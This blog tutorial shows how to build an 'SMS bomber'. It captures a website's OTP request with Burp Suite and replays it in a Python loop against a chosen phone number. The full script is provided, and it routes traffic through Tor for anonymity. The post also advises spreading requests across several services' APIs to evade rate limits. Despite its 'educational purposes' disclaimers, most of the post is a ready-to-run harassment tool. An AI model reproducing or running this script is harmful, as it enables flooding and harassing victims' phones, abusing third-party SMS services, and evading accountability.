Navigating the Digital Realm with Code and Security – Where Programming Insights Meet Cyber Vigilance. | अंत: अस्ति प्रारंभ:
How to Create Your Own SMSBomber Using Python
How to Create Your Own SMSBomber Using Python

How to Create Your Own SMSBomber Using Python

How to Create Your Own SMSBomber Using Python

In this guide, we’ll delve into creating an SMS bomber tool, demonstrating how to capture API requests using Burp Suite and automate them using Python’s requests library. By following this tutorial, you’ll understand how SMS sending requests work, enabling you to use these skills responsibly. Remember, this tutorial is solely for educational purposes, aimed at helping cybersecurity professionals and enthusiasts learn about web vulnerabilities and network behavior.

Understanding the SMSBomber

An SMSBomber essentially sends a large number of SMS messages to a single target number. We achieve this by identifying the API endpoints that services use to send SMS messages. Here’s a step-by-step guide on how to create a simple SMS bomber script using Python, requests, Burp Suite, and optional proxies for anonymity.

Setting Up Burp Suite to Capture SMS Requests

  1. Install Burp Suite: Download and install Burp Suite from its official website. Launch it and set up an HTTP proxy.
  2. Configure Proxy Settings: Set up your system or browser to route traffic through Burp Suite’s proxy.
  3. Identify the Target Site: Open a site or app with SMS capabilities. This could be any platform where you can legitimately generate an OTP.
  4. Capture the Request: Trigger an OTP to be sent to your number. Burp Suite will capture this request, allowing you to view details like headers, parameters, and the structure of the request.
  5. Analyze the API Request: Inspect the captured request. Note down the URL, headers, and payload as they’re critical for the Python script.

Capturing request

To design a powerfull SMSBomber we need to capture an request that send SMS. To capture an SMS sending API request using Burp Suite, visit a website or application that uses OTP-based login or verification via mobile number. Initiate the process by entering your phone number on the site and submitting the request to receive the OTP. With Burp Suite running and interception enabled, the tool will capture the outgoing HTTP or HTTPS request. Once intercepted, the request details will appear in Burp Suite’s Proxy > Intercept tab.

This captured request contains key components such as the request URL, the HTTP method (usually POST), headers (like Content-Type and User-Agent), and the request body, which often includes parameters like the phone number and any necessary payload data. Reviewing these details helps you understand how the API works and provides a clear foundation for replicating the request in automated scripts or for further testing purposes.

capture request for smsbomber

After capturing an SMS API request, you can analyze its details to understand how the OTP process works. The captured request is a POST call to an endpoint that handles sending SMS data, as indicated by the path /api/bloger/cta/push-data. The headers include typical elements like Content-Type, specifying application/x-www-form-urlencoded, and a User-Agent string identifying the browser used. The request body holds various parameters, such as source_pageevent_to, and ui_name, which describe the context of the request. Key data points include mobile, which represents the target phone number—in this example, 9999555545—and user_action, which shows the intent to send_otp.

The otp fields are present but empty, suggesting placeholders for where the OTP response might be handled later. The request structure and headers indicate that it mimics a legitimate interaction on a website or service with CORS (Cross-Origin Resource Sharing) settings configured, as suggested by headers like Sec-Fetch-Site and Origin. This type of analysis helps understand how web applications transmit data during an OTP process and provides a basis for scripting similar API calls programmatically for educational purposes.

Converting the Request to Python Using requests

To convert an HTTP request captured from a tool like Burp Suite into a Python requests script, you need to replicate the headers and payload in dictionary format and make a POST request. Here’s how to convert the request step-by-step:

Setting Up the Headers

Headers captured in an HTTP request are represented as key-value pairs in Python using dictionaries. Each header should be formatted as "Header-Name": "Value". Here is how to convert the headers from your captured request:

#headers for smsbomber
headers = {
    "Host": "services.example.com",
    "Sec-Ch-Ua": '"Chromium";v="119", "Not?A_Brand";v="24"',
    "Accept": "*/*",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Sec-Ch-Ua-Mobile": "?0",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
    "Sec-Ch-Ua-Platform": '"Linux"',
    "Origin": "https://example.com",
    "Sec-Fetch-Site": "same-site",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "https://example.com/",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Priority": "u=1, i",
    "Connection": "close"
}

Creating the Payload

The payload, or data, from the captured request should also be structured in dictionary format. You can extract the form data from the body and set it up as follows:

#payload for smsbomber
payload = {
    "source_page": "-",
    "event_to": "MoEngage",
    "ui_name": "GetStarted",
    "cta_name": "cta_GetStart",
    "cta_type": "Sign Up CTA",
    "cta_route": "https://service.example.com/api/bloger/cta/push-data",
    "user_action": "send_otp",
    "record_id": "0",
    "name": "jam",
    "mobile": "9999555545",
    "otp_1": "",
    "otp_2": "",
    "otp_3": "",
    "otp_4": ""
}

Making the POST Request

With the headers and payload set up, you can use the requests library to make a POST request:

#design python script for smsbomber
import requests

# URL of the endpoint
url = "https://services.example.com/api/bloger/cta/push-data"

# Sending the POST request
response = requests.post(url, headers=headers, data=payload)

# Print the response for verification
print(response.status_code)
print(response.text)

Testing the Script

Run the function and check if the SMS is sent. Always do this with permission!

otp_bomber

Adding User Input for Target and Message Count

To make this tool more interactive, allow user input for the target phone number and the number of messages to send.

#user input for smsbomber
target_number = input("Enter target number:")
how_many_time = int(input("How many otp you want to send:"))
for i in range(0, how_many_time):
sending_otp(target_number)

Using Proxies for Anonymity

Anonymity is crucial for ethical testing without revealing your IP address. To maintain anonymity while making HTTP requests in Python, you can route the requests through the Tor network using a proxy. Here’s how to modify your Python script to use the Tor proxy:

Start the Tor Service

Ensure that the Tor service is running on your system. Typically, you can start it using the command:

sudo service tor start

Tor usually listens on 127.0.0.1 and port 9050 for SOCKS5 connections.

Configure the Proxy in Python

You can set up the socks5 proxy in the requests module to route traffic through Tor. Here’s how to add the proxy configuration:

#Anonymity for smsbomber
# Setting up the proxy for Tor
proxies = {
    "http": "socks5://127.0.0.1:9050",
    "https": "socks5://127.0.0.1:9050"
}

# Sending the POST request through the Tor network
response = requests.post(url, headers=headers, data=payload, proxies=proxies)
  • Tor Proxy (socks5): By setting the proxies dictionary, the requests are routed through Tor, which provides anonymity.
  • Port 9050: This is the default port for Tor’s SOCKS5 proxy. Ensure your Tor configuration matches this.
  • Request Handling: The requests.post() function includes the proxies argument to route traffic through the specified proxy.

SMSBomber python script

#smsbomber complete python script
import requests

def sending_otp(target_number):
    # URL of the endpoint
    url = "https://services.example.com/api/bloger/cta/push-data"

    headers = {
        "Host": "services.example.com",
        "Sec-Ch-Ua": '"Chromium";v="119", "Not?A_Brand";v="24"',
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Sec-Ch-Ua-Mobile": "?0",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
        "Sec-Ch-Ua-Platform": '"Linux"',
        "Origin": "https://example.com",
        "Sec-Fetch-Site": "same-site",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": "https://example.com/",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Priority": "u=1, i",
        "Connection": "close"
    }

    payload = {
        "source_page": "-",
        "event_to": "MoEngage",
        "ui_name": "GetStarted",
        "cta_name": "cta_GetStart",
        "cta_type": "Sign Up CTA",
        "cta_route": "https://services.example.com/api/bloger/cta/push-data",
        "user_action": "send_otp",
        "record_id": "0",
        "name": "jam",
        "mobile": target_number,
        "otp_1": "",
        "otp_2": "",
        "otp_3": "",
        "otp_4": ""
    }

    # Setting up the proxy for Tor
    proxies = {
        "http": "socks5://127.0.0.1:9050",
        "https": "socks5://127.0.0.1:9050"
    }

    # Sending the POST request through the Tor network
    response = requests.post(url, headers=headers, data=payload, proxies=proxies)

    # Print the response for verification
    print(response.status_code)
    print(response.text)

def main():
    target_number = input("Enter target number:")
    how_many_time = int(input("How many otp you want to send:"))
    for i in range(0, how_many_time):
        sending_otp(target_number)

main()
smsbomber
Open Video

Using Multiple APIs for Enhanced Functionality

One way to avoid being rate-limited by a single API is to use multiple APIs. By distributing requests across various services, you can avoid overwhelming any one server and stay within acceptable usage limits. By using it you can build a powerfull SMSBomber.

Creating an SMSBomber is a powerful demonstration of how OTP services work, helping cybersecurity enthusiasts understand API behavior and request handling. Remember, responsible use of these techniques is essential. Using this knowledge ethically can support secure testing and development of robust systems against SMS bombing attacks.

This tutorial has walked you through capturing SMS requests using Burp Suite, scripting with Python’s requests library, enhancing privacy with proxies, and integrating multiple APIs to avoid rate limits. By experimenting within a safe, ethical environment, you can sharpen your skills while respecting the boundaries of ethical hacking.

This guide is for educational purposes only and aims to show how web requests can be captured and automated to better understand network security and API behavior. By learning how legitimate requests are structured, cybersecurity professionals and enthusiasts can improve their knowledge of web application security, test vulnerabilities, and understand how to protect APIs from potential misuse. Always ensure that any tests or automation performed are done ethically and with proper authorization, focusing on enhancing security and privacy rather than exploiting weaknesses.

How to Create Your Own SMSBomber Using Python

Leave a Reply

Your email address will not be published. Required fields are marked *